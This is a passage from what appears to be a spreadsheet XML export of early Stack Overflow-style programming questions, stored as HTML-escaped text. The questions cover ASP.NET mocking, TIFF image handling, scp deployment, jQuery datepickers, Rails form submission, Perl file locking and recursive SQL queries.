&lt;p&gt;&lt;em&gt;&lt;a href="http://www.blog.com/?p=122" rel="nofollow"&gt;http://www.blog.com/?p=122&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;in a windows hosted PHP server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mocking Asp.net-mvc Controller Context</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So the controller context depends on some asp.net internals. What are some ways to cleanly mock these up for unit tests? Seems like its very easy to clog up tests with tons of setup when I only need, for example, Request.HttpMethod to return "GET".&lt;/p&gt;
&lt;p&gt;I've seen some examples/helpers out on the nets, but some are dated. Figured this would be a good place to keep the latest and greatest.&lt;/p&gt;
&lt;p&gt;I'm using latest version of rhino mocks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I take a byte array of a TIFF image and turn it into a System.Drawing.Image object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;byte[]&lt;/code&gt; array, the contents of which represent a TIFF file (as in, if I write out these bytes directly to a file using the &lt;code&gt;BinaryWriter&lt;/code&gt; object, it forms a perfectly valid TIFF file) and I'm trying to turn it into a System.Drawing.Image object so that I can use it for later manipulation (feeding into a multipage TIFF object)&lt;/p&gt;
&lt;p&gt;The problem I'm having is that the commonly accepted code for this task:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public Image byteArrayToImage(byte[] byteArrayIn)
    {
        MemoryStream ms = new MemoryStream(byteArrayIn);
        Image returnImage = Image.FromStream(ms, true);
        return returnImage;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;doesn't work for me. The second line of the above method where it calls the &lt;code&gt;Image.FromStream&lt;/code&gt; method dies at runtime, saying&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Parameter Not Valid
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I believe that the method is choking on the fact that this is a TIFF file but I cannot figure out how to make the &lt;code&gt;FromStream&lt;/code&gt; method accept this fact.&lt;/p&gt;
&lt;p&gt;How do I turn a byte array of a TIFF image into an Image object?&lt;/p&gt;
&lt;p&gt;Also, like I said the end goal of this is to have a byte array representing a multipage TIFF file, which contains the TIFF files for which I have byte array objects of right now. If there's a much better way to go about doing this, I'm all for it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2003 internet connection</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently we got a new server at the office purely for testing purposes. It is set up so that we can access it from any computer. &lt;/p&gt;
&lt;p&gt;However today our ip got blocked from one of our other sites saying that our ip has been suspected of having a virus that sends spam emails. we learned this from the cbl &lt;a href="http://cbl.abuseat.org/" rel="nofollow"&gt;http://cbl.abuseat.org/&lt;/a&gt; &lt;/p&gt;
&lt;p&gt;So of course we turned the server off to stop this. The problem is the server must be on to continue developing our application and to access the database that is installed on it. Our normal admin is on vacation and is unreachable, and the rest of us are idiots(me included) in this area. &lt;/p&gt;
&lt;p&gt;We believe that the best solution is to remove it from connecting to the internet but still access it on the lan. If that is a valid solution how would this be done or is there a better way? say blocking specified ports or whatever.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Alternatives to System.exit(1)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For various reasons calling &lt;code&gt;System.exit&lt;/code&gt; is frowned upon when writing &lt;strong&gt;Java Applications&lt;/strong&gt;, so how can I notify the calling process that not everything is going according to plan?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; The 1 is a &lt;code&gt;standin&lt;/code&gt; for any non-zero exit code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a good dvd burning component for Windows or .Net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to add dvd burning functionality to my .Net app (running on Windows Server 2003), are there any good components available?  I've used the NeroCOM sdk that used to come with Nero but they no longer support the sdk in the latest versions of Nero.  I learned that Microsoft has created an IMAPI2 upgrade for Windows XP/2003 and there is an &lt;a href="http://www.codeproject.com/KB/miscctrl/imapi2.aspx" rel="nofollow"&gt;example project&lt;/a&gt; at CodeProject but not having used it myself I can't say how easy/reliable it is to use.&lt;/p&gt;
&lt;p&gt;I'm not really worried about burning audio/video to DVD as this is for file backup purposes only.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting the height of a DIV dynamically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a web application, I have a page that contains a DIV that has an auto-width depending on the width of the browser window.&lt;/p&gt;
&lt;p&gt;I need an auto-height for the object.  The DIV starts about 300px from the top screen, and it's height should make it stretch to the bottom of the browser screen.  I have a max height for the container DIV, so there would have to be minimum-height for the div.  I believe I can just restrict that in CSS, and use Javascript to handle the resizing of the DIV.&lt;/p&gt;
&lt;p&gt;My javascript isn't nearly as good as it should be.  Is there an easy script I could write that would do this for me?&lt;/p&gt;
&lt;p&gt;Edit: 
The DIV houses a control that does it's own overflow handling (implements its own scroll bar).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to pass method name to custom server control in asp.net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a Customer Server Control that extends another control.  There is no problem with attaching to other controls on the form.&lt;/p&gt;
&lt;p&gt;in vb.net:  Parent.FindControl(TargetControlName)&lt;/p&gt;
&lt;p&gt;I would like to pass a method to the control in the ASPX markup. &lt;/p&gt;
&lt;p&gt;for example: &amp;lt;c:MyCustomerControl runat=server InitializeStuffCallback="InitializeStuff"&amp;gt;&lt;/p&gt;
&lt;p&gt;So, I tried using reflection to access the given method name from the Parent.&lt;/p&gt;
&lt;p&gt;Something like (in VB)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim pageType As Type = Page.GetType
Dim CallbackMethodInfo As MethodInfo = pageType.GetMethod( "MethodName" )
'Also tried 
sender.Parent.GetType.GetMethod("MethodName")
sender.Parent.Parent.GetType.GetMethod("MethodName")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The method isn't found, because it just isn't apart of the Page.  Where should I be looking?  I'm fairly sure this is possible because I've seen other controls do similar.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I forgot to mention, my work-around is to give the control events and attaching to them in the Code-behind.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Caching Active Directory Data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In one of my applications, I am querying active directory to get a list of all users below a given user (using the "Direct Reports" thing). So basically, given the name of the person, it is looked up in AD, then the Direct Reports are read. But then for every direct report, the tool needs to check the direct reports of the direct reports. Or, more abstract: The Tool will use a person as the root of the tree and then walk down the complete tree to get the names of all the leaves (can be several hundred)&lt;/p&gt;
&lt;p&gt;Now, my concern is obviously performance, as this needs to be done quite a few times. My idea is to manually cache that (essentially just put all the names in a long string and store that somewhere and update it once a day).&lt;/p&gt;
&lt;p&gt;But I just wonder if there is a more elegant way to first get the information and then cache it, possibly using something in the System.DirectoryServices Namespace?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best use pattern for a DataContext</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best lifetime model for a DataContext? Should I just create a new one whenever I need it (aka, function level), should I keep one available in each class that would use it (class level), or should I create a static class with a static DataContext (app-domain level)? Are there any considered best practices on this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best approach to both modularity and platform independence?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I hope this question does not come off as broad as it may seem at first.  I am designing a software application in my &lt;code&gt;&amp;lt;sarcasm&amp;gt;&lt;/code&gt;&lt;em&gt;voluminous&lt;/em&gt;&lt;code&gt;&amp;lt;/sarcasm&amp;gt;&lt;/code&gt; spare time.  I would like it to be both cross-platform and modular.  At this point, because I am still in the planning phase, I can pick practically any language and toolset.&lt;/p&gt;
&lt;p&gt;This makes things harder, not easier, because there are seemingly so many ways of accomplishing both of the goals (modularity, platform agnosticism). &lt;/p&gt;
&lt;p&gt;My basic premise is that security, data storage, interaction with the operating system, and configuration should all be handled by a "container" application - but most of the other functionality will be supplied through plug-in modules.  If I had to describe it at a high level (without completely giving away my idea), it would be a single application that can do many different jobs, all dedicated to the same goal (there are lots of disparate things to do, but all the data has to interact and be highly available).&lt;/p&gt;
&lt;p&gt;This is not a new idea, and not particularly exotic.  Yet I find myself wrestling with not so much how to do it (I can think of lots of ways), but which method is best.&lt;/p&gt;
&lt;p&gt;For example, I know that Eclipse practically embodies what I am describing, but I find Java applications in general (and Eclipse is no exception) to be too large and slow for what I need. Ditto desktop apps written Python and Ruby (which are excellent languages!)  &lt;/p&gt;
&lt;p&gt;I don't mind recompiling the code base for different platforms as native exectables.  Yet, C and C++ have their own set of issues.&lt;/p&gt;
&lt;p&gt;As a C# developer, I have a preference for managed code.  But I am not at all sold on Mono, yet (I could be convinced).&lt;/p&gt;
&lt;p&gt;Does anyone have any ideas/experiences/ specific favorite frameworks to share?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best open-source Mathematica equivalent</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best open-source equivalent for Mathematica?  My requirements are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;(most important) Must be a real computer algebra system (CAS).  Notably, I don't want Matlab clones -- I want something that can, at least, symbolically differentiate and integrate.&lt;/li&gt;
&lt;li&gt;Must be programmable.  A functional-programming view of the world, like Mathematica's, would be awesome.  The basic datatype of M'ica is the list, which is very convenient!&lt;/li&gt;
&lt;li&gt;(least important) Similar syntax would be nice.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The ability to deal with objects such as groups or graphs would be a great bonus, but my primary emphasis is on the main things Mathematica and Maple do: algebra and calculus, both symbolic and numeric.  Also, plotting is not high on my list of requirements, as I'm mostly a terminal and not GUI user.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Drawing a custom label on a pie chart in Yahoo's Flash Library ASTRA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone looked at &lt;a href="http://developer.yahoo.com/flash/" rel="nofollow"&gt;Yahoo's ASTRA&lt;/a&gt;? It's fairly nifty, but I had some issues creating a custom label for a pie chart. They have an example for a line chart, which overrides an axis's series's label renderer.  My solution was to override the &lt;code&gt;myPieChart.dataTipFunction&lt;/code&gt;. For data that looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myPieChart.dataProvider =
  [ { category: "Groceries", cost: 50 },
    { category: "Transportation", cost: 175} ]
myPieChart.dataField = "cost";
myPieChart.categoryField = "category";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I wrote a function like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import com.yahoo.astra.fl.charts.series.*
myPieChart.dataTipFunction = 
  function (obj:Object, index:int, series:ISeries):String {
    return obj.category + "\n$" + obj.cost;
  };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There's ceil(2.718281828459045) problems with this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;I'm directly calling the category and cost properties of the data provider. The names are actually configurable when setting up the chart, I'd like to maintain that flexibility.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The default data tip would show the category, the cost (without a dollar sign), and the percentage it makes up in the pie chart. So here, I've lost the percentage. I just have no idea which property of what would hold that. It might be part of the series.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I probably only need to override the &lt;code&gt;dataItemRenderer&lt;/code&gt; for the cost part of the series, but I don't know how to access it.  The documentation is a little ... lacking there.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Normally I would just look at the default implementation of the &lt;code&gt;dataTipFunction&lt;/code&gt; but it's all inside a compiled shm that's part of the components distributed from yahoo.&lt;/p&gt;
&lt;p&gt;Can anyone help me complete this overridden function with percentage information and the flexibility mentioned in point 1?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the maximum amount of RAM I can use in a Windows box?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Obviously, that's 64-bit windows.&lt;/p&gt;
&lt;p&gt;Also, what's the maximum amount of memory a single 64-bit process can use?
I was kind of counting on using it all... 
(Yes, I know what I'm doing, please don't tell me that if I need that much RAM i must be doing something wrong)&lt;/p&gt;
&lt;p&gt;Also, is this the same for a .Net 2.0 process? Or is there a lower limit for .Net?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Change templates in Xcode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would I change the initial templates created by Xcode when creating a new Cocoa Class.&lt;/p&gt;
&lt;p&gt;I am referring to the comments and class name created when using Xcode's new class wizard.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I use `scp` to deploy a website's `.htaccess` file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently using the following command to upload my site content:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;scp -r web/* user@site.com:site.com/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works great except that the .htaccess file is not sent. Presumably, this is because it's hidden.&lt;/p&gt;
&lt;p&gt;I have tried adding a second line to send the file explicitely:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;scp -r web/.htaccess user@site.com:site.com/.htaccess
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works great except now I have to enter my password twice.&lt;/p&gt;
&lt;p&gt;Any thoughts on how to make this deploy with only 1 or 0 entries of my password?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to call Javascript's onsubmit event programatically on a form?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Ruby on Rails, I'm attempting to update the &lt;code&gt;innerHTML&lt;/code&gt; of a div tag using the &lt;code&gt;form_remote_tag&lt;/code&gt; helper.  This update happens whenever an associated select tag receives an onchange event.  The problem is, &lt;code&gt;&amp;lt;select onchange="this.form.submit();"&amp;gt;&lt;/code&gt;; doesn't work.  Nor does &lt;code&gt;document.forms[0].submit()&lt;/code&gt;.  The only way to get the onsubmit code generated in the form_remote_tag to execute is to create a hidden submit button, and invoke the click method on the button from the select tag.  Here's a working ERb partial example.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% form_remote_tag :url =&amp;gt; product_path, :update =&amp;gt; 'content', :method =&amp;gt; 'get' do -%&amp;gt;
  &amp;lt;% content_tag :div, :id =&amp;gt; 'content' do -%&amp;gt;
    &amp;lt;%= select_tag :update, options_for_select([["foo", 1], ["bar", 2]]), :onchange =&amp;gt; "this.form.commit.click" %&amp;gt;
    &amp;lt;%= submit_tag 'submit_button', :style =&amp;gt; "display: none" %&amp;gt;
  &amp;lt;% end %&amp;gt;
&amp;lt;% end %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I want to do is something like this, but it doesn't work.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% form_remote_tag :url =&amp;gt; product_path, :update =&amp;gt; 'content', :method =&amp;gt; 'get' do -%&amp;gt;
  &amp;lt;% content_tag :div, :id =&amp;gt; 'content' do -%&amp;gt;
    # the following line does not work
    &amp;lt;%= select_tag :update, options_for_select([["foo", 1], ["bar", 2]]), :onchange =&amp;gt; "this.form.onsubmit()" %&amp;gt;
  &amp;lt;% end %&amp;gt;
&amp;lt;% end %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, is there any way to remove the invisible submit button for this use case?&lt;/p&gt;
&lt;p&gt;There seems to be some confusion.  So, let me explain.  The basic problem is that &lt;code&gt;submit()&lt;/code&gt; doesn't call the &lt;code&gt;onsubmit()&lt;/code&gt; code rendered into the form.&lt;/p&gt;
&lt;p&gt;The actual HTML form that Rails renders from this ERb looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form action="/products/1" method="post" onsubmit="new Ajax.Updater('content', '/products/1', {asynchronous:true, evalScripts:true, method:'get', parameters:Form.serialize(this)}); return false;"&amp;gt;
  &amp;lt;div style="margin:0;padding:0"&amp;gt;
    &amp;lt;input name="authenticity_token" type="hidden" value="4eacf78eb87e9262a0b631a8a6e417e9a5957cab" /&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id="content"&amp;gt;
    &amp;lt;select id="update" name="update" onchange="this.form.commit.click"&amp;gt;
      &amp;lt;option value="1"&amp;gt;foo&amp;lt;/option&amp;gt;
      &amp;lt;option value="2"&amp;gt;bar&amp;lt;/option&amp;gt;
    &amp;lt;/select&amp;gt;
    &amp;lt;input name="commit" style="display: none" type="submit" value="submit_button" /&amp;gt;
  &amp;lt;/div&amp;gt;
&amp;lt;/form&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to axe the invisible submit button, but using a straight form.submit appears to not work.  So, I need some way to call the form's onsubmit event code.&lt;/p&gt;
&lt;p&gt;Update: Orion Edwards solution would work if there wasn't a &lt;code&gt;return(false);&lt;/code&gt; generated by Rails.  I'm not sure which is worse though, sending a phantom click to an invisible submit button or calling eval on the &lt;code&gt;getAttribute('onsubmit')&lt;/code&gt; call after removing the return call with a javascript string replacement!   &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you get the ethernet address using Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to retrieve the ethernet address of the network interface that is used to access a particular website.&lt;/p&gt;
&lt;p&gt;How can this be done in Java?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt; Note that the accepted solution of &lt;code&gt;getHardwareAddress&lt;/code&gt; is only available in Java 6. There does not seem to be a solution for Java 5 aside from executing i(f|p)confing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can't create a subversion repository with Eclipse 3.4.0, svn 1.5.1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on mac OS x 10.4. I have a subversion repository stored on an external drive connected via USB. I created a new python project in Eclipse (using the PyDev plugin). When I use right click Team-&gt;Share Project to set up a new prject with subversion, I get the following error:&lt;/p&gt;
&lt;p&gt;Error while creating module: org.tigris.subversion.javahl.ClientException: Couldn't open a repository
svn:  Unable to open ra_local session to URL
svn: Unable to open repository 'file:///Volumes/svn-repos/Palindrome/Palindrome'&lt;/p&gt;
&lt;p&gt;The subversion repository has the following permisions:
drwxrwxrwx     9 cameronl  cameronl   306 Aug 23 10:08 svn-repos&lt;/p&gt;
&lt;p&gt;The external drive is formatted as Mac OS extended.&lt;/p&gt;
&lt;p&gt;I'm completely stumped. Anybody have any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are Python threads buggy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A reliable coder friend told me that Python's current multi-threading implementation is seriously buggy - enough to avoid using altogether.  What can said about this rumor?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTML Scraping in Php</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been doing some html scraping in PHP using regular expressions.  This works, but the result is finicky and fragile.  Has anyone used any packages that provide a more robust solution?  A config driven solution would be ideal, but I'm not picky.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>COMException "Library not registered." while using System.DirectoryServices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have only just started received the following error in my windows forms application under dot net 2 framework on windows 2000 when using System.DirectoryServices.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    {System.Runtime.InteropServices.COMException}
System.Runtime.InteropServices.COMException: {"Library not registered."}
_className: Nothing
_COMPlusExceptionCode: -532459699
_data: Nothing
_dynamicMethods: Nothing
_exceptionMethod: Nothing
_exceptionMethodString: Nothing
_helpURL: Nothing
_HResult: -2147319779
_innerException: Nothing
_message: "Library not registered."
_remoteStackIndex: 0
_remoteStackTraceString: Nothing
_source: Nothing
_stackTrace: {System.Array}
_stackTraceString: Nothing
_xcode: -532459699
_xptrs: 0
Source: "System.DirectoryServices"
StackTrace: "   at System.DirectoryServices.DirectoryEntry.Bind(Boolean throwIfFail)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;at System.DirectoryServices.DirectoryEntry.Bind()
   at System.DirectoryServices.DirectoryEntry.get_AdsObject()
   at System.DirectoryServices.DirectorySearcher.FindAll(Boolean findMoreThanOne)
   at System.DirectoryServices.DirectorySearcher.FindAll()&lt;/p&gt;
&lt;p&gt;I have re-installed the framework and re-registered activeds.dll however this has not resolved the issue. I am guessing I need to find another dll and re-register it however it is not clear which dll this would be.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Has .NET made raw COM and DCOM programming redundant?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has the introduction of the .net framework made raw programming in COM and DCOM redundant ? &lt;/p&gt;
&lt;p&gt;(Except for using some COM+ services, e.g. for transaction management through the System.EnterpriseServices namespace)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make user controls know about css classes in ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since there are no header sections for user controls in asp.net, user controls have no way of knowing about stylesheet files. So css classes in the user controls are not recognized by visual studio and produces warnings. How can I make a user control know that it will relate to a css class, so if it is warning me about a non-existing css class, it means that the class really do not exist?&lt;/p&gt;
&lt;p&gt;Edit: Or should I go for a different design like exposing css classes as properties like "HeaderStyle-CssClass" of GridView?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a SHA1 hash in ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/SHA-1"&gt;SHA Hash functions&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a race condition?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When writing multi-threaded applications, one of the most common problems experienced are race conditions.  &lt;/p&gt;
&lt;p&gt;My questions to the community are:&lt;/p&gt;
&lt;p&gt;What is a race condition? How do you detect them? How do you handle them? Finally, how do you prevent them from occurring?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best quick-read Python book out there?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am taking a class that requires Python. We will review the language in class next week, and I am a quick study on new languages, but I was wondering if there are any really great Python books I can grab while I am struggling through the basics of setting up my IDE, server environment and all those other "gotchas" that come with a new programming language. Suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you pair program remotely?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a team of about 7 engineers, whom I supervise. We do not have a formal office where we all work. Instead, a handful are located outside of our city, while the rest of us are scattered around the Bay Area.&lt;/p&gt;
&lt;p&gt;Quite frequently, I find myself attempting to teach concepts like TDD or refactoring to some of our more junior (or not) developers. The best technique I know is pair programming, where you both sit at the same computer and work on a problem together. Since we are not in the same place most of the time, the only option is to use some kind of screen sharing and Skype to have one of us "drive" while the other consults, and then switch.&lt;/p&gt;
&lt;p&gt;My question is has anyone tried this "virtual" pair programming, and did you find it at all useful?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>duplicating jQuery datepicker</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The &lt;code&gt;datepicker&lt;/code&gt; function only works on the first input box that is created.&lt;/p&gt;
&lt;p&gt;I'm trying to duplicate a datepicker by cloning the &lt;code&gt;div&lt;/code&gt; that is containing it.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a href="#" id="dupMe"&amp;gt;click&amp;lt;/a&amp;gt;
&amp;lt;div id="template"&amp;gt;
input-text &amp;lt;input type="text" value="text1" id="txt" /&amp;gt;
date time picker &amp;lt;input type="text" id="example" value="(add date)" /&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To initialize the datepicker, according to the &lt;a href="http://docs.jquery.com/UI/Datepicker" rel="nofollow"&gt;jQuery UI documentation&lt;/a&gt; I only have to do &lt;code&gt;$('#example').datepicker();&lt;/code&gt; and it does work, but only on the first datepicker that is created.&lt;/p&gt;
&lt;p&gt;The code to duplicate the &lt;code&gt;div&lt;/code&gt; is the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("a#dupMe").click(function(event){
    event.preventDefault();
    i++;
    var a = $("#template").clone(true).insertBefore("#template").hide().fadeIn(1000);
    a.find("input#txt").attr('value', i);
    a.find("input#example").datepicker();
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The strangest thing is that on the &lt;code&gt;document.ready&lt;/code&gt; I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('#template #example').datepicker();
$("#template #txt").click(function() { alert($(this).val()); });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and if I click on the &lt;code&gt;#txt&lt;/code&gt; it always works.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I lock a file in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to create a lock on a file in Perl?&lt;/p&gt;
&lt;p&gt;Is it best to flock on the file or to create a lock file to place a lock on and check for a lock on the lock file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Comparison of Javascript libraries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After the suggestion to use a library for &lt;a href="http://stackoverflow.com/questions/34486/what-more-is-needed-for-ajax-than-this-function"&gt;my ajax needs&lt;/a&gt; I am going to use one, the problem is that there are so many and I've no idea how to even begin telling them apart.&lt;/p&gt;
&lt;p&gt;Thus, can anybody &lt;br /&gt;
A) Give a rundown of the differences or &lt;br /&gt;
B) Point me (and others like me) somewhere that has such a list. 
&lt;br /&gt;&lt;br /&gt;Failing that plan C is to go with whichever gets mentioned the most here.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>programmatically merge .reg file into win32 registry</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to programmatically merge a .reg file into the registry? This is for unit testing; the .reg file is a test artifact which will be added then removed at the start and end of testing.&lt;/p&gt;
&lt;p&gt;Or, if there's a better way to unit test against the registry...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Image processing in Silverlight 2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to do image processing in silverlight 2.0?&lt;/p&gt;
&lt;p&gt;What I want to do is take an image, crop it, and then send the new cropped image up to the server.  I know I can fake it by clipping the image, but that only effects the rendering of the image.  I want to create a new image.&lt;/p&gt;
&lt;p&gt;After further research I have answered my own question. Answer: &lt;strong&gt;No&lt;/strong&gt;.  Since all apis would be in &lt;a href="http://msdn.microsoft.com/en-us/library/system.windows.media.imaging.aspx" rel="nofollow"&gt;System.Windows.Media.Imaging&lt;/a&gt; and that namespace does not have the appropriate classes in Silverlight&lt;/p&gt;
&lt;p&gt;I'm going to use fjcore.  &lt;a href="http://code.google.com/p/fjcore/" rel="nofollow"&gt;http://code.google.com/p/fjcore/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Thanks &lt;a href="http://stackoverflow.com/users/585/jonas-folles" rel="nofollow"&gt;Jonas&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Verilog automatic task</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What does it mean if a task is declared with the automatic keyword in Verilog?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;task automatic do_things;
  input [31:0] number_of_things;
  reg [31:0] tmp_thing;
  begin
    // ...
  end
endtask;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note: This question is mostly because I'm curious if there are any hardware programmers on the site. :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Retrieving HTTP status code from loaded iframe with Javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I used the jQuery Form plugin for asynchronous form submission. For forms that contain files, it copies the form to a hidden iframe, submits it, and copies back the iframe's contents. The problem is that I can't figure out how to find what HTTP status code was returned by the server. For example, if the server returns 404, the data from the iframe will be copied as normal and treated as a regular response.&lt;/p&gt;
&lt;p&gt;I've tried poking around in the iframe objects looking for some sort of &lt;code&gt;status_code&lt;/code&gt; attribute, but haven't been able to find anything like that.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;$.ajax()&lt;/code&gt; function can't be used, because it does not support uploading files. The only way to asynchronously upload files that I know of is using the hidden &lt;code&gt;iframe&lt;/code&gt; method.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you get the last record generated in a recursive CTE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the code below I am using a recursive CTE(Common Table Expression) in SQL Server 2005 to try and find the top level parent of a basic hierarchical structure. The rule of this hierarchy is that every CustID has a ParentID and if the CustID has no parent then the ParentID = CustID and it is the highest level.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DECLARE @LookupID int
--Our test value
SET @LookupID = 1
WITH cteLevelOne (ParentID, CustID) AS
(
    	SELECT   a.ParentID, a.CustID
    	FROM     tblCustomer AS a
    	WHERE    a.CustID = @LookupID
    UNION ALL
    	SELECT   a.ParentID, a.CustID
    	FROM     tblCustomer AS a
    	INNER JOIN cteLevelOne AS c ON a.CustID = c.ParentID
    	WHERE c.CustID &amp;lt;&amp;gt; a.CustomerID
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So if tblCustomer looks like this:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ParentID    CustID
5            5
1            8
5            4
4            1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The result I get from the code above is:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ParentID    CustID
4            1
5            4
5            5
&lt;/code&gt;&lt;/pre&gt;
